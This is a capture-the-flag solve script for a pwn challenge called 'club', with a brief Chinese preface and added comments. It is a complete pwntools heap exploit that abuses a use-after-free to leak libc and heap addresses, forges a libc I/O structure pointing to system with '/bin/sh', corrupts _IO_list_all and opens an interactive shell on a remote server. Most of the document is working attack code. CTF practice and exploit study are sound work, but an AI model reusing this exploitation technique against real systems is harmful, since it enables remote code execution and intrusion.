囧，对我来说太复杂了，东拼西凑居然搞出来了，大家还是看别人的解析吧，我就贴贴代码。
和 free 有关的
各种参考资料
调试工具
"""
Solve script for the 'club' pwn challenge (the binary name comes from the
commented-out process()/gdb.debug() lines).  It drives a menu-based service
over pwntools; going by the helper names, menu option 1 allocates a "box",
2 frees one, 3 writes into one and 4 reads one back, each step prompted
with "> ".

Written for Python 2 pwntools: payloads are built as str with embedded NUL
bytes and handed straight to p.send()/u64(); under Python 3 they would have
to be bytes.

From a defensive reading the script depends on two things the service should
not allow: boxes 3 and 2 are read back -- and box 3 is written -- AFTER they
have been freed, i.e. the service keeps serving freed storage (a
use-after-free), and every libc address below is a hard-coded offset for the
remote's exact libc build.  The original is a single collapsed line; only
line breaks and comments have been added here.
"""
from pwn import *
context.arch = 'amd64'          # u64()/p64() below pack/unpack little-endian 64-bit words
context.terminal = '/bin/sh'    # only relevant to the commented-out gdb.debug() path
#p = process('./club')
#p = gdb.debug("./club")
p = remote("123.206.22.95", 8888)   # challenge server as given in the writeup


def get_box(idx, sz):
    """Menu option 1 (presumably "allocate"): box `idx` of size `sz`.

    Both values are sent as decimal text after their own "> " prompt.
    """
    p.recvuntil("> ")
    p.send("1")
    p.recvuntil("> ")
    p.send(str(idx))
    p.recvuntil("> ")
    p.send(str(sz))


def del_box(idx):
    """Menu option 2 (presumably "free"): release box `idx`."""
    p.recvuntil("> ")
    p.send("2")
    p.recvuntil("> ")
    p.send(str(idx))


def set_box(idx, msg):
    """Menu option 3 (presumably "write"): store `msg` in box `idx`.

    `msg` is sent followed by a single newline, so it must not contain one
    itself.  Note the check is an `assert`, so it is stripped under
    `python -O`.
    """
    p.recvuntil("> ")
    p.send("3")
    p.recvuntil("> ")
    p.send(str(idx))
    assert "\n" not in msg
    p.send(msg + "\n")


def show_box(idx):
    """Menu option 4 (presumably "read"): return one line of box `idx`'s
    contents, without the trailing newline."""
    p.recvuntil("> ")
    p.send("4")
    p.recvuntil("> ")
    p.send(str(idx))
    return p.recvline(keepends=False)


# --- leak 1: libc ---
# Box 3 is allocated, freed, then read back: the service still serves a
# freed box.  The variable name says the leaked qword is main_arena+88; the
# three constants after it are offsets into the remote's libc build (by their
# names: main_arena, _IO_list_all and system).  Nothing here derives them --
# they are valid only for that one build and must be re-checked elsewhere.
get_box(3, 1024)
get_box(4, 2048)
del_box(3)
main_arena_88 = u64(show_box(3).ljust(8, "\0"))   # echoed line can be shorter than 8 bytes; zero-pad before unpacking
libc_base = main_arena_88 - 0x3C4B78
IO_list_all = libc_base + 0x3C5520
psystem = libc_base + 0x45390

# --- leak 2: heap ---
# Same read-after-free pattern with box 2.  pbuf is placed a fixed 960 bytes
# below the leaked value; the layout of boxes 2 and 3 relative to each other
# that this assumes is not stated on the page -- confirm under a debugger.
get_box(2, 480)
get_box(1, 464)
del_box(2)
part2 = u64(show_box(2).ljust(8, "\0"))
pbuf = part2 - 960

# --- forged structure, padded to exactly 480 bytes ---
# Starts with the string "/bin/sh" and ends with psystem as its last qword;
# the fixed padding points (0xc0, 0xd8, 480) read like field offsets of a
# forged libc I/O structure, but that is inferred from the shape, not stated.
payload = "/bin/sh\x00" + p64(96) + p64(part2) + p64(pbuf-16) + p64(0) + p64(1)
payload = payload.ljust(0xc0, "\0")
payload += p64(2**64-1)
payload = payload.ljust(0xd8,'\x00')
payload += p64(pbuf + 480 + 0xd8 + 8) + p64(0) + p64(0)
payload += p64(1) + p64(psystem)
payload = payload.ljust(480, "\0")

# --- the write-after-free ---
# Box 3 was freed above and is now written to.  The 1008-byte message is
# laid out as: 4 header words (the second is IO_list_all-0x10), 448 bytes of
# filler up to offset 480, the 480-byte forged structure, then 6 trailing
# words (p64(64), main_arena_88, pbuf+480, ...) which look like chunk-header
# fields -- again inferred from their shape, not documented on the page.
set_box(3, p64(pbuf+480) + p64(IO_list_all-0x10) + p64(0) + p64(0) + "A"*448 + \
payload + \
p64(0) + p64(64) + p64(main_arena_88) + p64(pbuf+480) + p64(0) + p64(0))

# A further large allocation is, presumably, what makes the allocator act on
# the corrupted state written above (its effect is not visible from the
# script itself); p.interactive() then hands the connection to the user.
get_box(5, 4000)
p.interactive()